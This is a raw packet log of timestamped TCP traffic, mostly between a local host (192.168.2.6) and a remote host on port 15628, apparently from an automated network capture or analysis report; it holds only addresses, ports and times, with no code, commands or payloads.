Jul 20, 2024 16:31:13.280812979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.281786919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.286684990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.286859989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.291862965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.292177916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.300152063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.300508976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.307256937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.307391882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.312536001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.312664032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.320375919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.320616007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.327536106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.327692986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.332647085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.332777977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.337845087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.337974072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.343581915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.343749046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.349040985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.349211931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.354871035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.355506897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.360471010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.361162901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.366317034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.366444111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.373121977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.373591900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.378575087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.378711939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.384066105 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.384224892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.392245054 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.392507076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.399101973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.399291992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.408062935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.408487082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.413549900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.413727045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.418699980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.418822050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.423755884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.423841953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.428853989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.428914070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.433914900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.433969975 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.439055920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.439115047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.444420099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.444478989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.449546099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.449614048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.454590082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.454667091 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.459762096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.459820032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.465107918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.465169907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.471393108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.471467972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.476417065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.476480961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.481400967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.481463909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.490642071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.490701914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.497960091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.498018026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.509540081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.509610891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.518403053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.523214102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.528299093 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.528351068 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.534601927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.534656048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.546736002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.546802998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.554332972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.554392099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.559793949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.559860945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.564815998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.564935923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.569998980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.607142925 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.612162113 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.612215996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.618153095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.618207932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.624675989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.624730110 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.632877111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.632937908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.650875092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.650937080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.668071032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.668131113 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.674151897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.678406000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.685327053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.685395956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.696137905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:13.811808109 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:13.811849117 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:13.966649055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:13.971703053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.141947031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.149097919 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.190350056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.195333958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.205245972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.210278034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.210335016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.215369940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.250699043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.255635023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.263062000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.267973900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.268038988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.273009062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.273091078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.278048038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.278228998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.284804106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.284861088 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.294704914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.294778109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.299900055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.302390099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.307385921 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.307440042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.312474966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.313956022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.318932056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.319160938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.325989008 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.326044083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.330996990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.331053972 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.337554932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.337893009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.343503952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.343556881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.349227905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.349283934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.355009079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.355104923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.361402988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.361526012 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.370115042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.370301008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.378428936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.378509998 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.383677006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.383802891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.390073061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.390139103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.395122051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.395255089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.400283098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.400512934 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.405565023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.405632019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.421149015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.421243906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.426846027 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.426939011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.464914083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.480859041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.481163025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.481251955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.481390953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.481538057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.483572006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.486108065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.486620903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.486726046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.489331007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.490860939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.492954969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.494954109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.495923042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.496042967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.499872923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.501426935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.501848936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.508764982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.509079933 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.514384985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.515270948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.523195982 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.523433924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.530553102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.531618118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.542524099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.542875051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.547930002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.548243999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.553328991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.553500891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.558592081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.559469938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.564521074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.564868927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.570276976 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.570422888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.575455904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.575968981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.582645893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.584151983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.590035915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.590445042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.595422029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.600538969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.606014967 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.610027075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.614891052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.622520924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.627518892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.635938883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.642137051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.648458004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.653507948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.658015013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.665112019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.672355890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.687176943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.692348957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.697572947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.704497099 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.709599018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.716459990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.737884998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.738607883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.748541117 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.749140978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.763274908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.763586044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.769387007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.770121098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.776181936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.777164936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.782516956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.782911062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.788216114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.788841963 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.793917894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.794140100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.802782059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.803567886 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.808553934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.808928967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.814414978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.815073967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.820854902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.821557045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.827641964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.828305006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.833343029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.833966970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.839811087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.840447903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.848325014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.848464966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.853568077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.853837967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.858942986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.859051943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.863981962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.864275932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.869240046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.869529009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.874562025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.874931097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.883533001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.884309053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.889190912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.889455080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.894505024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.894614935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.900140047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.900305986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.905292034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.905392885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.910355091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.910659075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.916193962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.916371107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.921787977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.921864986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.945472002 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.945705891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.952255011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.952508926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.959289074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.959549904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.964530945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.964782000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.970299959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.970648050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.977061987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.977430105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.988218069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.988334894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.993344069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:14.993536949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:14.998843908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.000526905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.006505966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.006592989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.011554956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.011673927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.016675949 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.016841888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.032924891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.033058882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.038211107 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:15.038419008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:15.044524908 CEST	15628	49722	154.204.0.5	192.168.2.6
